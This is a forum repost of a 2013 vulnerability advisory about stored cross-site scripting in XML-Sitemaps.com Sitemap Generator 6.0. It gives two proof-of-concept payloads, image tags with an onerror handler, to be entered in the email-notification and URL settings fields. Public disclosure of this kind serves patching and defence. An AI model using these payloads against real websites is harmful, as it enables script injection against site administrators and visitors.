Jump to content
Matt

XML-Sitemaps.com Sitemap Generator 6.0 Cross Site Scripting

By Matt, in Exploituri

Recommended Posts

Matt Newbie

Matt

Posted
Posted

Description : XML-Sitemaps.com Sitemap Generator version 6.0 suffers from a cross site scripting vulnerability.

Author : Christy Philip Mathew

Source : XML-Sitemaps.com Sitemap Generator 6.0 Cross Site Scripting ? Packet Storm

Code : 

# XML-Sitemaps.com Sitemap Generator
# Date: 2nd July 2013
# Author: Christy Philip Mathew (www.offcon.org)
# Vendor or Software Link: http://www.xml-sitemaps.com/generator-demo/
# Version : 6.0

*XSS Vulnerability *

(a) Configuration > Miscellaneous Settings > Send email notifications:

Update the email to a@a.com"><img src=x onerror=prompt(0);>

( Update the URL input box with

http://site.com"><img src=x onerror=prompt(/XSS/);>

Screenshot Attached


All the Best

*Christy Philip Mathew*
Information Security Researcher
Twitter: @christypriory

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...